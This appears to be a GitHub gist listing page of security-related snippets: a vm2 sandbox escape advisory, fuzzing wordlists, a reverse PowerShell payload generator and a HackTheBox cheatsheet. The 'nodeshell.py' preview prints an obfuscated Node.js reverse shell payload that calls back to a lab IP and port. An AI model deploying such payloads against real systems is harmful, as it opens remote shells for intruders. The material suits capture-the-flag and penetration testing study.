Skip to content

Instantly share code, notes, and snippets.

View JavierOlmedo's full-sized avatar
🕵️‍♀️
Researching!!

Javier Olmedo JavierOlmedo

🕵️‍♀️
Researching!!
230 followers · 320 following
View GitHub Profile
@leesh3288
leesh3288 / vm2_3.9.16_sandbox_escape.md
Last active April 7, 2024 01:14
Sandbox Escape in vm2@3.9.16

Sandbox Escape in vm2@3.9.16

Summary

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

Proof of Concept

@tillson
tillson / gist:620e8ef87bc057f25b0a27c423433fda
Created May 10, 2020 19:22
Decode Base64 strings in a git repo's commit history
from pydriller import RepositoryMining
import re
import base64
foundSet = set()
for commit in RepositoryMining('./').traverse_commits():
for mod in commit.modifications:
if mod.source_code_before != None:
regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before)
for result in regex:
@s4vitar
s4vitar / Cómo construir tu propio sistema linux.md
Last active March 7, 2024 15:23
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active April 27, 2024 09:32
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@ayoubfathi
ayoubfathi / revip.py
Created April 13, 2019 07:01
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@mitchmoser
mitchmoser / Celestial nodeshell.py
Created August 27, 2018 05:05
./nodeshell.py 10.10.14.101 1337
[+] LHOST = 10.10.14.101
[+] LPORT = 1337
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,49,48,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,9
@AvasDream
AvasDream / htb.md
Last active May 4, 2024 21:19
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@nzec
nzec / README.MD
Last active February 23, 2024 01:08
DeezLoader Offical Page

Thanks to /u/zpoo32 for reporting several issues in this list!

Deemix

  • deemix: just the cli and the library
  • deemix-pyweb: the app with a GUI
  • deemix-server: just the server part of deemix-pyweb
@Zate
Zate / get_go.sh
Last active February 5, 2024 18:19
Shell script to download and install latest golang
#! /bin/bash
# [get_golang.sh](https://gist.github.com/n8henrie/1043443463a4a511acf98aaa4f8f0f69)
# Download latest Golang release for AMD64
# https://dl.google.com/go/go1.10.linux-amd64.tar.gz
set -euf -o pipefail
# Install pre-reqs
sudo apt-get install python3 git -y
o=$(python3 -c $'import os\nprint(os.get_blocking(0))\nos.set_blocking(0, True)')